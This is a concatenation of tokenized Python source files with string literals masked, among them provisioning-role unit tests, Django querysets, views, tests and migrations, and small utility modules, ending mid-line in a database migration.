'<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . force_update ( ) <EOL> self . assertTrue ( self . role . context [ '<STR_LIT>' ] ) <EOL> self . role . execute . assert_called_once_with ( '<STR_LIT>' , stdout = False , sudo = True ) <EOL> self . role . store_update_date . 
assert_called_once_with ( ) <EOL> @ istest <EOL> def checks_that_a_package_is_installed ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '''<STR_LIT:yes>''' <EOL> self . assertTrue ( self . role . is_package_installed ( '<STR_LIT:foo>' ) ) <EOL> execute . assert_called_once_with ( '<STR_LIT>' , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_a_package_is_not_installed ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '''<STR_LIT>''' <EOL> self . assertFalse ( self . role . is_package_installed ( '<STR_LIT>' ) ) <EOL> execute . assert_called_once_with ( '<STR_LIT>' , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_a_package_exists ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> self . assertTrue ( self . role . package_exists ( '<STR_LIT>' ) ) <EOL> execute . assert_called_with ( '<STR_LIT>' , stdout = False ) <EOL> @ istest <EOL> def checks_that_a_package_doesnt_exist ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = False <EOL> self . assertFalse ( self . role . package_exists ( '<STR_LIT>' ) ) <EOL> execute . assert_called_with ( '<STR_LIT>' , stdout = False ) <EOL> @ istest <EOL> def traps_sys_exit_when_checking_if_a_package_exists ( self ) : <EOL> def exit ( * args , ** kwargs ) : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> execute = MagicMock ( side_effect = exit ) <EOL> with patch ( '<STR_LIT>' , execute ) : <EOL> self . assertFalse ( self . role . package_exists ( '<STR_LIT>' ) ) <EOL> @ istest <EOL> def checks_if_a_package_exists_before_installing ( self ) : <EOL> with self . execute_mock ( ) as execute , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) as ( package_exists , is_package_installed ) : <EOL> is_package_installed . return_value = False <EOL> package_exists . return_value = True <EOL> result = self . role . ensure_package_installed ( '<STR_LIT>' ) <EOL> self . 
assertTrue ( result ) <EOL> self . assertTrue ( package_exists . called ) <EOL> execute . assert_called_with ( '<STR_LIT>' , stdout = False , sudo = True ) <EOL> @ istest <EOL> def fails_to_install_package_if_it_doesnt_exist ( self ) : <EOL> with self . execute_mock ( ) , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) as ( package_exists , is_package_installed ) : <EOL> is_package_installed . return_value = False <EOL> package_exists . return_value = False <EOL> self . assertRaises ( PackageNotFound , self . role . ensure_package_installed , '<STR_LIT>' ) <EOL> self . assertTrue ( package_exists . called ) <EOL> @ istest <EOL> def doesnt_install_package_if_already_installed ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . is_package_installed . return_value = True <EOL> result = self . role . ensure_package_installed ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) </s>
<s> from mock import patch <EOL> from nose . tools import istest <EOL> from provy . more . debian import ApacheRole , AptitudeRole <EOL> from tests . unit . tools . helpers import ProvyTestCase <EOL> class ApacheRoleTest ( ProvyTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ApacheRoleTest , self ) . setUp ( ) <EOL> self . role = ApacheRole ( prov = None , context = { } ) <EOL> @ istest <EOL> def installs_necessary_packages_to_provision ( self ) : <EOL> with self . using_stub ( AptitudeRole ) as aptitude : <EOL> self . role . provision ( ) <EOL> aptitude . ensure_package_installed . assert_called_with ( '<STR_LIT>' ) <EOL> @ istest <EOL> def ensures_module_is_installed_and_enabled ( self ) : <EOL> with self . using_stub ( AptitudeRole ) as aptitude , self . execute_mock ( ) as execute : <EOL> self . role . ensure_mod ( '<STR_LIT:foo>' ) <EOL> aptitude . ensure_package_installed . assert_called_with ( '<STR_LIT>' ) <EOL> execute . assert_called_with ( '<STR_LIT>' , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def ensures_site_is_available_from_template ( self ) : <EOL> with self . execute_mock ( ) , self . mock_role_method ( '<STR_LIT>' ) as update_file , self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . create_site ( '<STR_LIT>' , template = '<STR_LIT>' ) <EOL> update_file . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , options = { } , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def ensures_site_is_available_from_template_and_options ( self ) : <EOL> with self . execute_mock ( ) , self . mock_role_method ( '<STR_LIT>' ) as update_file , self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . create_site ( '<STR_LIT>' , template = '<STR_LIT>' , options = { '<STR_LIT:foo>' : '<STR_LIT>' } ) <EOL> update_file . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , options = { '<STR_LIT:foo>' : '<STR_LIT>' } , sudo = True ) <EOL> self . assertTrue ( self . 
role . must_restart ) <EOL> @ istest <EOL> def ensures_that_a_website_is_enabled ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) as remote_symlink : <EOL> self . role . ensure_site_enabled ( '<STR_LIT>' ) <EOL> remote_symlink . assert_called_with ( from_file = '<STR_LIT>' , to_file = '<STR_LIT>' , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def ensures_that_a_website_is_disabled ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) as remove_file : <EOL> self . role . ensure_site_disabled ( '<STR_LIT>' ) <EOL> remove_file . assert_called_with ( '<STR_LIT>' , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def can_be_restarted ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> self . role . restart ( ) <EOL> execute . assert_called_with ( '<STR_LIT>' , sudo = True ) <EOL> @ istest <EOL> def ensures_that_it_must_be_restarted ( self ) : <EOL> self . assertFalse ( self . role . must_restart ) <EOL> self . role . ensure_restart ( ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def must_not_restart_again_if_already_restarted ( self ) : <EOL> with self . execute_mock ( ) : <EOL> self . role . ensure_restart ( ) <EOL> self . role . restart ( ) <EOL> self . assertFalse ( self . role . must_restart ) <EOL> @ istest <EOL> def restarts_on_cleanup_if_must_be_restarted ( self ) : <EOL> with patch ( '<STR_LIT>' ) as restart : <EOL> self . role . ensure_restart ( ) <EOL> self . role . cleanup ( ) <EOL> self . assertTrue ( restart . called ) <EOL> @ istest <EOL> def doesnt_restart_on_cleanup_if_doesnt_need_to_be_restarted ( self ) : <EOL> with patch ( '<STR_LIT>' ) as restart : <EOL> self . role . cleanup ( ) <EOL> self . assertFalse ( restart . called ) </s>
<s> from thumbnails . engines . dummy import DummyEngine <EOL> from thumbnails . engines . pillow_engine import PillowEngine <EOL> from thumbnails . engines . wand_engine import WandEngine <EOL> from thumbnails . engines . pgmagick_engine import PgmagickEngine </s>
<s> """<STR_LIT>""" <EOL> from jinja2 import Template <EOL> from branca . element import MacroElement <EOL> class ScrollZoomToggler ( MacroElement ) : <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ScrollZoomToggler , self ) . __init__ ( ) <EOL> self . _name = '<STR_LIT>' <EOL> self . _template = Template ( """<STR_LIT>""" ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import atexit <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> _exithandlers = [ ] <EOL> def _run_exitfuncs ( ) : <EOL> """<STR_LIT>""" <EOL> exc_info = None <EOL> while _exithandlers : <EOL> func , targs , kargs = _exithandlers . pop ( ) <EOL> try : <EOL> func ( * targs , ** kargs ) <EOL> except SystemExit : <EOL> exc_info = sys . exc_info ( ) <EOL> except : <EOL> import traceback <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> traceback . print_exc ( ) <EOL> exc_info = sys . exc_info ( ) <EOL> if exc_info is not None : <EOL> raise exc_info [ <NUM_LIT:0> ] ( exc_info [ <NUM_LIT:1> ] ) <EOL> def register ( func , * targs , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( atexit , "<STR_LIT>" ) : <EOL> atexit . register ( func , * targs , ** kargs ) <EOL> else : <EOL> _exithandlers . append ( ( func , targs , kargs ) ) <EOL> return func <EOL> def unregister ( func ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( atexit , "<STR_LIT>" ) : <EOL> atexit . unregister ( func ) <EOL> else : <EOL> handler_entries = [ e for e in _exithandlers if e [ <NUM_LIT:0> ] == func ] <EOL> for e in handler_entries : <EOL> _exithandlers . remove ( e ) <EOL> if not hasattr ( atexit , "<STR_LIT>" ) : <EOL> atexit . register ( _run_exitfuncs ) </s>
<s> import os <EOL> def get_test_rss_path ( ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) </s>
<s> from django . db . models . query import QuerySet <EOL> class PostQuerySet ( QuerySet ) : <EOL> def public ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_PUBLIC ) <EOL> def private ( self ) : <EOL> return self . filter ( status__in = [ <EOL> self . model . STATUS_PRIVATE , <EOL> ] ) </s>
<s> from . base import BaseDownloadTests <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . urlresolvers import reverse <EOL> from . . models import OS , Release <EOL> from pages . models import Page <EOL> import json <EOL> User = get_user_model ( ) <EOL> class DownloadViewsTests ( BaseDownloadTests ) : <EOL> def test_download_full_os_list ( self ) : <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_download_release_detail ( self ) : <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . release_275 . slug } ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_download_os_list ( self ) : <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . linux . slug } ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_download ( self ) : <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_latest_redirects ( self ) : <EOL> latest_python2 = Release . objects . released ( ) . python2 ( ) . latest ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertRedirects ( response , latest_python2 . get_absolute_url ( ) ) <EOL> latest_python3 = Release . objects . released ( ) . python3 ( ) . latest ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertRedirects ( response , latest_python3 . 
get_absolute_url ( ) ) <EOL> class DownloadApiViewsTest ( BaseDownloadTests ) : <EOL> def setUp ( self ) : <EOL> super ( ) . setUp ( ) <EOL> self . staff_user = User . objects . create_user ( <EOL> username = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> ) <EOL> self . staff_user . is_staff = True <EOL> self . staff_user . save ( ) <EOL> self . staff_key = self . staff_user . api_key . key <EOL> self . Authorization = "<STR_LIT>" % ( self . staff_user . username , self . staff_key ) <EOL> def json_client ( self , method , url , data = None , ** headers ) : <EOL> if not data : <EOL> data = { } <EOL> client_method = getattr ( self . client , method . lower ( ) ) <EOL> return client_method ( url , json . dumps ( data ) , content_type = '<STR_LIT:application/json>' , ** headers ) <EOL> def test_get_os ( self ) : <EOL> url = '<STR_LIT>' <EOL> self . client . logout ( ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_post_os ( self ) : <EOL> url = '<STR_LIT>' <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . client . logout ( ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data , HTTP_AUTHORIZATION = self . Authorization ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_delete_os ( self ) : <EOL> url = '<STR_LIT>' % OS . objects . all ( ) [ <NUM_LIT:0> ] . pk <EOL> self . client . logout ( ) <EOL> response = self . json_client ( '<STR_LIT>' , url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . json_client ( '<STR_LIT>' , url , HTTP_AUTHORIZATION = self . Authorization ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_get_release ( self ) : <EOL> url = '<STR_LIT>' <EOL> self . client . 
logout ( ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_post_release ( self ) : <EOL> release_page = Page . objects . create ( <EOL> title = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> content = '<STR_LIT>' <EOL> ) <EOL> url = '<STR_LIT>' <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' % release_page . pk <EOL> } <EOL> self . client . logout ( ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data , HTTP_AUTHORIZATION = self . Authorization ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) </s>
<s> import datetime <EOL> from django . db . models import Q <EOL> from django . db . models . query import QuerySet <EOL> from django . utils import timezone <EOL> class JobTypeQuerySet ( QuerySet ) : <EOL> def active ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . filter ( active = True ) <EOL> def with_active_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> return self . active ( ) . filter ( <EOL> jobs__status = '<STR_LIT>' , <EOL> jobs__expires__gte = now , <EOL> ) . distinct ( ) <EOL> class JobCategoryQuerySet ( QuerySet ) : <EOL> def active ( self ) : <EOL> return self . filter ( active = True ) <EOL> def with_active_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> return self . filter ( <EOL> jobs__status = '<STR_LIT>' , <EOL> jobs__expires__gte = now , <EOL> ) . distinct ( ) <EOL> class JobQuerySet ( QuerySet ) : <EOL> def approved ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_APPROVED ) <EOL> def archived ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_ARCHIVED ) <EOL> def draft ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_DRAFT ) <EOL> def expired ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_EXPIRED ) <EOL> def rejected ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_REJECTED ) <EOL> def removed ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_REMOVED ) <EOL> def featured ( self ) : <EOL> return self . filter ( is_featured = True ) <EOL> def review ( self ) : <EOL> review_threshold = timezone . now ( ) - datetime . timedelta ( days = <NUM_LIT> ) <EOL> return self . filter ( <EOL> Q ( status__exact = self . model . STATUS_REVIEW ) & <EOL> Q ( created__gte = review_threshold ) <EOL> ) . order_by ( '<STR_LIT>' ) <EOL> def visible ( self ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> return self . 
filter ( <EOL> Q ( status__exact = self . model . STATUS_APPROVED ) & <EOL> Q ( expires__gte = now ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT:30> , default = '<STR_LIT>' , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:html>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> import os <EOL> from bs4 import BeautifulSoup <EOL> from django . test import TestCase <EOL> from django . conf import settings <EOL> from django . core . management import call_command <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . test . utils import override_settings <EOL> from pages . models import Image <EOL> FAKE_PEP_REPO = os . path . join ( settings . BASE , '<STR_LIT>' ) <EOL> class PEPManagementCommandTests ( TestCase ) : <EOL> @ override_settings ( PEP_REPO_PATH = '<STR_LIT>' ) <EOL> def test_generate_pep_pages ( self ) : <EOL> with self . assertRaises ( ImproperlyConfigured ) : <EOL> call_command ( '<STR_LIT>' ) <EOL> @ override_settings ( PEP_REPO_PATH = FAKE_PEP_REPO ) <EOL> def test_generate_pep_pages_real ( self ) : <EOL> call_command ( '<STR_LIT>' ) <EOL> @ override_settings ( PEP_REPO_PATH = FAKE_PEP_REPO ) <EOL> def test_image_generated ( self ) : <EOL> call_command ( '<STR_LIT>' ) <EOL> img = Image . objects . get ( page__path = '<STR_LIT>' ) <EOL> soup = BeautifulSoup ( img . page . content . raw ) <EOL> self . assertIn ( settings . MEDIA_URL , soup . find ( '<STR_LIT>' ) [ '<STR_LIT:src>' ] ) </s>
<s> from django . views . generic import ListView <EOL> from . models import Sponsor <EOL> class SponsorList ( ListView ) : <EOL> model = Sponsor <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def get_queryset ( self ) : <EOL> return Sponsor . objects . select_related ( ) . published ( ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT:description>' , self . gf ( '<STR_LIT>' ) ( blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT:status>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:200> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . 
gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( object_id_field = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] , frozen_by_south = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:content>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:file>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> ) ) , <EOL> ) ) <EOL> db . 
send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : 
